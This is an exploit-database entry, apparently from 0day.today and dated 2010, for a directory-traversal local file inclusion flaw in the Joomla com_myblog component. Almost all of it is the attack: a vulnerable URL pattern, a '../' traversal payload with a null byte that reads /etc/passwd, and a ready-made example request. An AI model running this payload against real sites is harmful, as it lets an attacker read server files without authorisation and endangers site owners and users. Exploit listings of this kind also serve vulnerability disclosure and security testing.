id: 11166
date: 03/03/2010
title: Joomla Component com_blog directory traversal LFI Vulnerability
author: DevilZ TM
cves: 

===============================================================
Joomla Component com_blog directory traversal LFI Vulnerability
===============================================================

[~]######################################### ExploiT #################################################[~]
 
[~] Vulnerable File :
 
http://127.0.0.1/index.php?option=com_myblog&Itemid=12&task=[LFI]
 
[~] ExploiT         :
 
../../../../../../../../etc/passwd%00
 
[~] Example         :
 
http://127.0.0.1/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../etc/passwd%00



#  0day.today [2023-03-27]  #